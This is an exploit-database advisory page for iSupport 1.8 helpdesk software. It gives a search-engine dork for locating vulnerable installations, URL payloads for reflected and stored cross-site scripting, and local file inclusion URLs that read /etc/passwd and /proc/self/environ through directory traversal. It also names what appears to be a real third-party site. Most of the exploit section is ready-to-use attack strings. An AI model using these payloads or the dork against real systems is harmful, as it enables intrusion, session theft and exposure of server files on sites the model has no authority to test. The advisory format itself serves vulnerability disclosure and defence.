iSupport - exploit.company

vendor:

iSupport

by:

Stink' & Essandre

8.8

CVSS

HIGH

Cross-Site Scripting (XSS) and Local File Inclusion (LFI)

79 (XSS) and 22 (LFI)

CWE

Product Name: iSupport

Affected Version From: 1.8

Affected Version To: 1.8

Patch Exists: No

Related CWE: N/A

CPE: a:idevspot:isupport:1.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2009

iSupport <= 1.8 XSS/Local File Include Exploit

iSupport version 1.8 is vulnerable to Cross-Site Scripting (XSS) and Local File Inclusion (LFI) attacks. An attacker can inject malicious JavaScript code into the vulnerable parameters of the application, which will be executed in the browser of the victim. An attacker can also exploit the LFI vulnerability to read sensitive files from the server.

Mitigation:

The vulnerability can be mitigated by validating user input and sanitizing it before processing.

Source

Exploit-DB raw data:

---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------


Discovered by : Stink' & Essandre
DATE : 16/12/09

//////////////////////////////////////////////////////////////////////

Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $

//////////////////////////////////////////////////////////////////////


[+] Vulnerability and Exploitation

Dork : "Powered by [ iSupport 1.8 ]"


--[XSS]--

http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]

Exemple :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E

--[XSS]-- in the member zone

http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" and you have your alert xss:)

--[LFI]--

http://[TARGET]/[PATH]/index.php?include_file=[LFI]

Exemple :

http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd


[+] Solution :

N/A

The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.